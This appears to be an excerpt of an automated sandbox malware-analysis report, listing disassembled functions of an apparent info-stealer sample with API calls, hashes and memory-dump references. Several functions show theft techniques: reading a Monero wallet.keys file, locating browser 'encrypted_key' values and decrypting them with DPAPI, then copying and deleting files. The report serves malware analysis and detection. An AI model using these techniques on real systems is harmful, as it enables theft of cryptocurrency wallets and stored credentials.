                              • Instruction ID: 35049f0ea5961abe0890f602429eb4003559a612b89bd1cb4fb59979a702bfb2
                              • Opcode Fuzzy Hash: c9f1af44e29dd47cbbbdcdc94c602c5034321782d3659a07a35c767b23a27f38
                              • Instruction Fuzzy Hash: AF910FB191011C9ACB14FBA8DC96DFE7338EF14300F51C169F61AA6095EF746A09CB72
                              Function 00DED780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DF8B60: GetSystemTime.KERNEL32(00E00E1A,01979D18,00E005AE,?,?,00DE13F9,?,0000001A,00E00E1A,00000000,?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DF8B86
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00DED801
                              • lstrlen.KERNEL32(00000000), ref: 00DED99F
                              • lstrlen.KERNEL32(00000000), ref: 00DED9B3
                              • DeleteFileA.KERNEL32(00000000), ref: 00DEDA32
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                              • String ID:
                              • API String ID: 211194620-0
                              • Opcode ID: 757336a909d840892d96cf035e55d6499dd52495af3dbb58fbaf7f99443e978d
                              • Instruction ID: 894a40f8a613dd5edcddb581b598285d71ef63565b32c5320e311f8b7f7c0b70
                              • Opcode Fuzzy Hash: 757336a909d840892d96cf035e55d6499dd52495af3dbb58fbaf7f99443e978d
                              • Instruction Fuzzy Hash: 12810FB191011C9ACB14FBA8DC96DFE7338EF54340F55C129F60AA6095EF746A09CB72
                              Function 00DF3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 552eceb0cdc38636209d83386e35bfba7ab807b8232cd464b8e95b53c5f61c71
                              • Instruction ID: f744e9287e0410f2c33a4f273542452dffe72fb9436c006176a3025726966624
                              • Opcode Fuzzy Hash: 552eceb0cdc38636209d83386e35bfba7ab807b8232cd464b8e95b53c5f61c71
                              • Instruction Fuzzy Hash: 87411CB1D1020EEBCB04EFA8D845AFEB774EF44304F15C418E616B6290DB75AA49CBB1
                              Function 00DE9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00DE9D39
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9AEF
                                • Part of subcall function 00DE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B01
                                • Part of subcall function 00DE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00DE4EEE,00000000,00000000), ref: 00DE9B2A
                                • Part of subcall function 00DE9AC0: LocalFree.KERNEL32(?,?,?,?,00DE4EEE,00000000,?), ref: 00DE9B3F
                                • Part of subcall function 00DE9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00DE9B84
                                • Part of subcall function 00DE9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00DE9BA3
                                • Part of subcall function 00DE9B60: LocalFree.KERNEL32(?), ref: 00DE9BD3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                              • String ID: $"encrypted_key":"$DPAPI
                              • API String ID: 2100535398-738592651
                              • Opcode ID: dfc55b8444cbade0b342bb67dcfed37afe17acec7f8ce036d4abc9e7a358bf2a
                              • Instruction ID: 074205fd76fc3d7fb26244f5a3406469f84e7de7be4644da5180eff1dca8888d
                              • Opcode Fuzzy Hash: dfc55b8444cbade0b342bb67dcfed37afe17acec7f8ce036d4abc9e7a358bf2a
                              • Instruction Fuzzy Hash: E4315EB6D01219ABCF14EBE5DC95AEEB7B8EF48300F144518EA05A7241EB349A04CBB1
                              Function 00DF92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00DF3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00DF3AEE,?), ref: 00DF92FC
                              • GetFileSizeEx.KERNEL32(000000FF,00DF3AEE), ref: 00DF9319
                              • CloseHandle.KERNEL32(000000FF), ref: 00DF9327
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandleSize
                              • String ID:
                              • API String ID: 1378416451-0
                              • Opcode ID: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                              • Instruction ID: 6d957af6572b69ffdae4ffa927f33fcce5df715b20d072493b2048bbf28636ad
                              • Opcode Fuzzy Hash: cc9ce9e6ee6ddae8804b00417948868fff04fa46de1f709363e7083bd5395ac0
                              • Instruction Fuzzy Hash: A2F06934F00208FBDB20DEA4DC18FAEB7F9AB48310F21C254EA91A72C4DA7596008B50
                              Function 00DFC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __getptd.LIBCMT ref: 00DFC74E
                                • Part of subcall function 00DFBF9F: __amsg_exit.LIBCMT ref: 00DFBFAF
                              • __getptd.LIBCMT ref: 00DFC765
                              • __amsg_exit.LIBCMT ref: 00DFC773
                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00DFC797
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                              • String ID:
                              • API String ID: 300741435-0
                              • Opcode ID: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                              • Instruction ID: 7fff97b43733d334436f56b55935f516305b2def4e0f9bd117f504ff066576ac
                              • Opcode Fuzzy Hash: 71ca922e7d8a71707d3b51c24646a8e1095c9e7aeec4134f5d5dec8c60337b0d
                              • Instruction Fuzzy Hash: 98F0907291430C9BD720BBB89D06B7A33A0EF00735F2BD14AF744AA1D2DB645990DE76
                              Function 00DF4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF4F7A
                              • lstrcat.KERNEL32(?,00E01070), ref: 00DF4F97
                              • lstrcat.KERNEL32(?,019786C0), ref: 00DF4FAB
                              • lstrcat.KERNEL32(?,00E01074), ref: 00DF4FBD
                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                                • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                                • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                                • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                              • Instruction ID: 4449cc0008ea4fe21374c391efa08b5fa422ba5b740b157a115c0b35c53724e8
                              • Opcode Fuzzy Hash: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                              • Instruction Fuzzy Hash: BD218B7AA00308ABC774FB60DC46EEE733CEB54300F108554F69997585DEB996C88BB1